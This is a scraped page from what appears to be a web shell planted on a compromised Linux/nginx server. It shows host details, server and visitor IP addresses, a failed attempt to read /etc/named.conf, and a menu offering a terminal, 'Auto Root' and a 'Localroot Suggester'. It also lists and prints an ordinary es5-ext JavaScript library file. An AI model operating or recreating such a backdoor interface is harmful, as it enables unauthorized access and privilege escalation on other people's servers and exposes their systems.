Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.188.73.229
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
node_modules /
es5-ext /
function /
# /
Delete
Unzip
Name
Size
Permission
Date
Action
compose.js
641
B
-rw-rw-r--
2022-08-30 11:49
copy.js
541
B
-rw-rw-r--
2022-08-30 11:49
curry.js
801
B
-rw-rw-r--
2022-08-30 11:49
index.js
329
B
-rw-rw-r--
2022-08-30 11:49
lock.js
262
B
-rw-rw-r--
2022-08-30 11:49
microtask-delay.js
398
B
-rw-rw-r--
2022-08-30 11:49
not.js
319
B
-rw-rw-r--
2022-08-30 11:49
partial.js
439
B
-rw-rw-r--
2022-08-30 11:49
spread.js
235
B
-rw-rw-r--
2022-08-30 11:49
to-string-tokens.js
560
B
-rw-rw-r--
2022-08-30 11:49
Save
Rename
"use strict"; var validFunction = require("../valid-function"); var re1 = /^\s*function[\0-')-\uffff]*\(([\0-(*-\uffff]*)\)\s*\{([\0-\uffff]*)\}\s*$/ , re2 = /^\s*\(?([\0-'*-\uffff]*)\)?\s*=>\s*(\{?[\0-\uffff]*\}?)\s*$/; module.exports = function () { var str = String(validFunction(this)), data = str.match(re1); if (!data) { data = str.match(re2); if (!data) throw new Error("Unrecognized string format"); data[1] = data[1].trim(); if (data[2][0] === "{") data[2] = data[2].trim().slice(1, -1); } return { args: data[1], body: data[2] }; };